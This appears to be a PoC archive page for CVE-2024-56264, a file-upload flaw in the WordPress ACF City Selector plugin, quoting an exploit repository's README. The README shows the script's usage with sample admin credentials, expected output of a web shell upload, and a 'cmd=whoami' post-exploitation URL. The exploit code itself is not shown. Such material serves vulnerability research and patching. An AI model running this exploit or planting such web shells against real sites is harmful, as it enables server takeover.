Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-56264 PoC — WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

Source
https://github.com/dpakmrya/CVE-2024-56264
Associated Vulnerability
Title:WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability (CVE-2024-56264)
Description:Unrestricted Upload of File with Dangerous Type vulnerability in Beee ACF City Selector acf-city-selector allows Upload a Web Shell to a Web Server.This issue affects ACF City Selector: from n/a through <= 1.14.0.
Readme
# CVE-2024-56264

## WordPress ACF City Selector - Arbitrary File Upload Exploit (CVE-2024-56264)

### Overview
This repository contains an exploit for **CVE-2024-56264**, which is an **Arbitrary File Upload** vulnerability found in the WordPress **ACF City Selector** plugin (versions **<= 1.14.0**). This vulnerability allows an attacker to upload a **malicious PHP file (web shell)** to a vulnerable WordPress instance and execute arbitrary commands on the server.

### CVE Details
- **CVE ID:** CVE-2024-56264
- **Published Date:** January 2, 2025
- **Affected Plugin:** ACF City Selector
- **Vulnerable Versions:** `<= 1.14.0`
- **Impact:** Remote Code Execution (RCE) via unrestricted file upload

### Description
The ACF City Selector plugin fails to properly validate uploaded files, allowing attackers to **bypass restrictions** and upload **arbitrary PHP files**. Once a malicious PHP file is uploaded, an attacker can execute system commands remotely, leading to **full server compromise**.



## Requirements

### 📌 Dependencies
Ensure the following are installed before running the script:

- **Python 3.x**
- `requests` module (Install using: `pip install requests`)

You can install all required dependencies using:
```sh
pip install -r requirements.txt
```

## 🚀 Usage
Running the exploit:

```
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

```
### Example:
```
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
```
## Expected Output
Upon successful exploitation, you should see:
```
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
```


### Post-Exploitation
If successful, access the uploaded shell via:
```
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
```
This allows remote command execution on the server.

## ⚠ Disclaimer
This script is intended **only for educational and authorized security testing purposes**. **Unauthorized use is illegal** and may result in severe consequences. The author is **not responsible** for any misuse of this exploit.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →